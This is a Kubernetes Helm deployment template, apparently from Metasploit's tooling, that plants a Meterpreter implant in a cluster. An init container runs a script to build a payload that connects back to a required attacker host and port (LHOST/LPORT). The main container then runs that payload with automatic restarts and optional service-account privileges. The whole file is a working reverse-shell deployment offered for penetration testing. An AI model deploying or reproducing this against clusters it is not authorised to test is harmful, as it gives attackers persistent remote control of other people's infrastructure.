metasploit-gs/kubernetes/meterpreter/templates/deployment.yaml

apiVersion: apps/v1
kind: Deployment
metadata:
  name: {{ include "meterpreter.fullname" . }}
  labels:
    {{- include "meterpreter.labels" . | nindent 4 }}
spec:
  replicas: 1
  selector:
    matchLabels:
      {{- include "meterpreter.selectorLabels" . | nindent 6 }}
  template:
    metadata:
      labels:
        {{- include "meterpreter.selectorLabels" . | nindent 8 }}
    spec:
    {{- with .Values.imagePullSecrets }}
      imagePullSecrets:
        {{- toYaml . | nindent 8 }}
    {{- end }}
      {{- if .Values.privileges.useServiceAccount }}
      serviceAccountName: {{ include "meterpreter.fullname" . }}
      {{ else }}
      automountServiceAccountToken: false
      {{ end }}
      securityContext:
        {{- toYaml .Values.privileges.podSecurityContext | nindent 8 }}
      initContainers:
        - name: msfvenome
          image: "{{ .Values.image.repository}}:{{ .Values.image.tag }}"
          imagePullPolicy: {{ .Values.image.pullPolicy }}
          command: ["/bin/bash", "-c", "/tmp/meterpreter.sh"]
          env:
            - name: LHOST
              value: "{{ required "Please provide value to 'lhost' - The IP Address the payload will connect to" .Values.lhost }}"
            - name: LPORT
              value: "{{ required "Please provide value to 'lport' - The Port the payload will connect to" .Values.lport }}"
          volumeMounts:
            - name: meterpreter
              mountPath: /meterpreter
            - name: msfvenome
              mountPath: /tmp/meterpreter.sh
              subPath: meterpreter.sh

      containers:
        - name: {{ .Chart.Name }}
          image: gcr.io/google_containers/pause-amd64:3.0
          imagePullPolicy: {{ .Values.image.pullPolicy }}
          command: ["/meterpreter/meterpreter"]
          tty: true
          stdin: true
          securityContext:
            {{- toYaml .Values.privileges.securityContext | nindent 12 }}

          resources:
            {{- toYaml .Values.resources | nindent 12 }}
          volumeMounts:
            - name: meterpreter
              mountPath: /meterpreter

      restartPolicy: Always
      volumes:
        - name: meterpreter
          emptyDir: {}
        - name: msfvenome
          configMap:
            name: {{ include "meterpreter.fullname" . }}
            items:
            - key: meterpreter.sh
              path: meterpreter.sh
            defaultMode: 0777


      {{- with .Values.nodeSelector }}
      nodeSelector:
        {{- toYaml . | nindent 8 }}
      {{- end }}
    {{- with .Values.affinity }}
      affinity:
        {{- toYaml . | nindent 8 }}
    {{- end }}
    {{- with .Values.tolerations }}
      tolerations:
        {{- toYaml . | nindent 8 }}
    {{- end }}